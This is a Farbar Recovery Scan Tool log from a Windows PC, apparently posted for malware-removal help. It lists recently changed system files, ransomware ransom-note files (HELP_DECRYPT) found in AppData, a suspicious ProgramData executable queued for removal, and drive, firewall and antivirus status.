2015-08-14 14:34 - 2015-07-16 02:29 - 07458648 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-08-14 14:34 - 2015-07-16 02:29 - 01735000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-08-14 14:34 - 2015-07-16 02:29 - 00101720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mountmgr.sys
2015-08-14 14:34 - 2015-07-16 02:28 - 01499920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-08-14 14:34 - 2015-07-10 19:54 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2015-08-14 14:33 - 2015-07-19 03:58 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2015-08-14 14:33 - 2015-07-18 20:51 - 03704320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2015-08-14 14:33 - 2015-07-18 20:31 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2015-08-14 14:33 - 2015-07-18 20:31 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2015-08-14 14:33 - 2015-07-18 20:31 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2015-08-14 14:33 - 2015-07-18 20:29 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2015-08-14 14:33 - 2015-07-18 20:29 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2015-08-14 14:33 - 2015-07-18 20:29 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2015-08-14 14:33 - 2015-07-18 20:28 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2015-08-14 14:33 - 2015-07-18 20:12 - 02228736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2015-08-14 14:33 - 2015-07-18 20:10 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2015-08-14 14:33 - 2015-07-18 20:09 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2015-08-14 14:32 - 2015-07-16 22:36 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-08-14 14:32 - 2015-07-16 22:36 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2015-08-14 14:32 - 2015-07-16 22:35 - 02885632 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-08-14 14:32 - 2015-07-16 22:26 - 05923328 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-08-14 14:32 - 2015-07-16 22:23 - 00615936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2015-08-14 14:32 - 2015-07-16 22:21 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-08-14 14:32 - 2015-07-16 21:53 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2015-08-14 14:32 - 2015-07-16 21:51 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-08-14 14:32 - 2015-07-16 21:50 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
2015-08-14 14:32 - 2015-07-16 21:45 - 02279424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-08-14 14:32 - 2015-07-16 21:45 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2015-08-14 14:32 - 2015-07-16 21:41 - 00479232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
2015-08-14 14:32 - 2015-07-16 21:39 - 00664064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-08-14 14:32 - 2015-07-16 21:38 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2015-08-14 14:32 - 2015-07-16 21:36 - 00801280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2015-08-14 14:32 - 2015-07-16 21:34 - 14451200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-08-14 14:32 - 2015-07-16 21:32 - 02125824 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2015-08-14 14:32 - 2015-07-16 21:14 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2015-08-14 14:32 - 2015-07-16 21:13 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2015-08-14 14:32 - 2015-07-16 21:12 - 04520448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-08-14 14:32 - 2015-07-16 21:12 - 02427904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-08-14 14:32 - 2015-07-16 21:10 - 12856832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-08-14 14:32 - 2015-07-16 21:06 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2015-08-14 14:32 - 2015-07-16 21:01 - 01545728 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-08-14 14:32 - 2015-07-16 20:52 - 01048576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2015-08-14 14:32 - 2015-07-16 20:49 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2015-08-14 14:32 - 2015-07-16 20:42 - 01951232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-08-14 14:32 - 2015-07-16 20:38 - 01310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-08-14 14:32 - 2015-07-16 20:37 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2015-08-14 14:30 - 2015-07-29 01:24 - 00025776 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2015-08-14 14:30 - 2015-07-28 16:24 - 01148416 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 01116160 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00069120 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2015-08-14 14:30 - 2015-07-07 11:40 - 00270168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdFilter.sys
2015-08-14 14:30 - 2015-07-07 11:40 - 00114520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdNisDrv.sys
2015-08-14 14:30 - 2015-07-07 11:40 - 00044560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2015-08-14 14:30 - 2015-07-02 00:19 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebClnt.dll
2015-08-14 14:30 - 2015-07-02 00:16 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\system32\davclnt.dll
2015-08-14 14:30 - 2015-07-01 23:37 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebClnt.dll
2015-08-14 14:30 - 2015-07-01 23:35 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\davclnt.dll
2015-08-14 14:30 - 2015-06-12 19:03 - 18823680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2015-08-14 14:30 - 2015-06-12 18:36 - 15159296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2015-08-14 14:29 - 2015-07-29 16:37 - 01994752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2015-08-14 14:29 - 2015-07-29 16:30 - 01381888 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2015-08-14 14:29 - 2015-07-29 16:23 - 01559552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2015-08-14 14:29 - 2015-07-24 20:57 - 04177408 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2015-08-14 14:29 - 2015-07-24 20:57 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-08-14 14:29 - 2015-07-24 20:52 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2015-08-14 14:29 - 2015-07-24 19:27 - 00301568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-08-14 14:29 - 2015-07-24 19:23 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2015-08-14 14:29 - 2015-07-14 23:59 - 01113944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-08-14 14:29 - 2015-07-14 23:59 - 00487256 _____ (Microsoft Corporation) C:\WINDOWS\system32\netcfgx.dll
2015-08-14 14:29 - 2015-07-14 23:59 - 00393560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netcfgx.dll
2015-08-14 14:29 - 2015-07-14 05:22 - 02529880 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2015-08-14 14:29 - 2015-07-14 05:21 - 01901776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2015-08-14 14:29 - 2015-07-13 21:46 - 00059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2015-08-14 14:29 - 2015-07-13 21:45 - 00059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2015-08-14 14:29 - 2015-07-10 20:19 - 01101824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdvidcrl.dll
2015-08-14 14:29 - 2015-07-10 19:42 - 02345472 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2015-08-14 14:29 - 2015-07-10 19:14 - 00856064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvidcrl.dll
2015-08-14 14:29 - 2015-07-10 19:13 - 07032320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2015-08-14 14:29 - 2015-07-10 18:47 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2015-08-14 14:29 - 2015-07-10 18:31 - 06213120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2015-08-14 14:29 - 2015-07-09 19:13 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\notepad.exe
2015-08-14 14:29 - 2015-07-09 19:13 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\notepad.exe
2015-08-14 14:29 - 2015-07-09 18:30 - 00212992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\notepad.exe
2015-08-14 14:29 - 2015-06-11 22:12 - 02476376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2015-08-14 14:29 - 2015-06-11 22:12 - 00428888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-09-08 19:04 - 2015-02-07 14:44 - 00198144 ___SH C:\Users\tomas\Desktop\Thumbs.db
2015-09-08 19:04 - 2015-02-05 20:07 - 00000000 ____D C:\WarThunder
2015-09-08 19:04 - 2014-12-22 18:54 - 00000000 ____D C:\Users\tomas
2015-09-08 19:02 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\sru
2015-09-08 19:01 - 2015-07-26 20:16 - 00000000 ____D C:\Users\tomas\Desktop\stul
2015-09-08 19:01 - 2015-04-11 23:09 - 00000000 ____D C:\Users\tomas\Documents\Data
2015-09-08 19:01 - 2015-01-16 19:52 - 00000000 ____D C:\Users\tomas\Documents\My Games
2015-09-08 18:58 - 2015-07-30 21:10 - 00000000 ____D C:\Users\tomas\Desktop\Nová složka
2015-09-08 18:57 - 2014-12-22 21:24 - 00000000 ____D C:\Users\tomas\AppData\Roaming\ICQM
2015-09-08 18:57 - 2014-12-22 20:37 - 00000000 ____D C:\Users\tomas\AppData\Roaming\Mozilla
2015-09-08 18:57 - 2014-12-22 19:25 - 00000000 ____D C:\Users\tomas\AppData\Roaming\uTorrent
2015-09-08 18:56 - 2014-12-22 21:24 - 00000000 ____D C:\Users\tomas\AppData\Roaming\ICQ-Profile
2015-09-08 18:53 - 2015-04-11 23:18 - 00000000 ____D C:\Users\tomas\AppData\Local\Skyrim
2015-09-08 18:53 - 2014-12-22 19:22 - 00000000 ____D C:\Users\tomas\AppData\Local\Google
2015-09-08 18:52 - 2015-05-16 23:13 - 00000000 ____D C:\Users\tomas\AppData\Local\Geckofx
2015-09-08 18:52 - 2015-01-20 21:18 - 00000000 ____D C:\Users\tomas\AppData\Local\DassaultSystemes
2015-09-06 18:05 - 2014-12-22 19:00 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-20688079-3506957125-3551254075-1001
2015-09-06 17:15 - 2015-05-06 22:18 - 00000000 ____D C:\Program Files (x86)\Steam
2015-09-06 16:55 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-09-06 16:49 - 2013-08-22 15:25 - 00000207 _____ C:\WINDOWS\win.ini
2015-09-06 16:25 - 2013-08-22 15:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2015-09-06 16:07 - 2014-12-22 19:16 - 00747334 _____ C:\WINDOWS\system32\perfh005.dat
2015-09-06 16:07 - 2014-12-22 19:16 - 00154558 _____ C:\WINDOWS\system32\perfc005.dat
2015-09-06 16:07 - 2014-03-18 12:04 - 01745984 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-09-05 10:33 - 2014-12-22 19:23 - 00002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-09-05 10:30 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-09-05 10:29 - 2015-07-22 19:26 - 00001950 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2015-08-29 03:21 - 2014-12-22 19:22 - 00003956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-08-29 03:21 - 2014-12-22 19:22 - 00003720 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-08-29 03:21 - 2014-12-22 19:22 - 00000984 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-08-29 03:21 - 2014-12-22 19:22 - 00000980 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-08-27 05:55 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\rescache
2015-08-26 22:01 - 2013-08-22 17:20 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-08-15 08:20 - 2013-08-22 16:44 - 00500248 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-08-15 08:18 - 2015-01-07 22:00 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2015-08-15 08:18 - 2015-01-07 22:00 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Windows Defender
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2015-08-14 15:03 - 2014-12-23 11:43 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2015-08-14 15:03 - 2014-12-23 11:39 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-08-14 15:02 - 2015-01-07 22:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2015-08-14 15:00 - 2014-12-22 21:09 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-08-14 14:54 - 2014-12-22 21:09 - 132483416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-08-14 14:48 - 2015-04-16 18:36 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-08-14 14:48 - 2014-12-23 12:51 - 00000000 ___SD C:\WINDOWS\system32\CompatTel
2015-08-14 14:48 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-08-14 14:48 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
==================== Files in the root of some directories =======
2015-09-08 18:57 - 2015-09-08 18:57 - 0008628 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.HTML
2015-09-08 18:57 - 2015-09-08 18:57 - 0045651 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.PNG
2015-09-08 18:57 - 2015-09-08 18:57 - 0004254 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.TXT
2015-09-08 18:57 - 2015-09-08 18:57 - 0000292 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.URL
2015-09-08 18:53 - 2015-09-08 18:53 - 0008628 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.HTML
2015-09-08 18:53 - 2015-09-08 18:53 - 0045651 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.PNG
2015-09-08 18:53 - 2015-09-08 18:53 - 0004254 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.TXT
2015-09-08 18:53 - 2015-09-08 18:53 - 0000292 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.URL
2015-03-26 20:22 - 2015-03-26 20:22 - 0000000 ___SH () C:\Users\tomas\AppData\Local\LumaEmu
2014-12-23 03:11 - 2014-12-23 03:11 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-07-15 00:36 - 2015-06-15 23:16 - 0071680 ___SH (dswteyurtetuitr) C:\ProgramData\mscivosu.exe
Files to move or delete:
====================
C:\ProgramData\mscivosu.exe
Some files in TEMP:
====================
C:\Users\tomas\AppData\Local\Temp\avgnt.exe
C:\Users\tomas\AppData\Local\Temp\headhunter.dll
C:\Users\tomas\AppData\Local\Temp\laminator.dll
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2015-09-02 19:11
==================== End of FRST.txt ============================
===***===***===***=== Extract of Additional scan result of Farbar Recovery Scan Tool ===***===***===***===
==================== Drive and Memory info ===================
Drive c: () (Fixed) (Total:194.97 GB) (Free:46.25 GB) NTFS
Drive d: () (Fixed) (Total:722.7 GB) (Free:705.56 GB) NTFS
Drive e: () (Fixed) (Total:13.49 GB) (Free:13.49 GB) FAT32
Available physical RAM: 5085.76 MB
Total physical RAM: 8075.43 MB
Percentage of memory in use: 37%
==================== MBR and Partition Table ==================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 2BFB4DC8)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=195 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=722.7 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=13.5 GB) - (Type=0C)
==================== Scheduled Tasks (whitelisted) ==================
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
==================== Alternate Data Streams (whitelisted) ==================
==================== Security Center ==================
AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
===***===***===***=== Supplementary Scan createdy by FRSTLauncher ===***===***===***===
Posledni aktualizace FRSTLauncheru: 25_11_2013 (01)
Posledni aktualizace Modifikacniho skriptu: 30_09_2013 (01)
***** Velikost "Plochy" *****
Velikost slozky "C:\Users\tomas\Desktop" je 260 MB.
***** Startup Programs *****
***** Firewall rules *****
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
EnableFirewall REG_DWORD 0x1
DisableNotifications REG_DWORD 0x0
DoNotAllowExceptions REG_DWORD 0x0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
EnableFirewall REG_DWORD 0x1
DisableNotifications REG_DWORD 0x0
DoNotAllowExceptions REG_DWORD 0x0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
***** System Restore *****
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"Generalize_DisableSR"=dword:00000000
==================== End Of Log ==============================
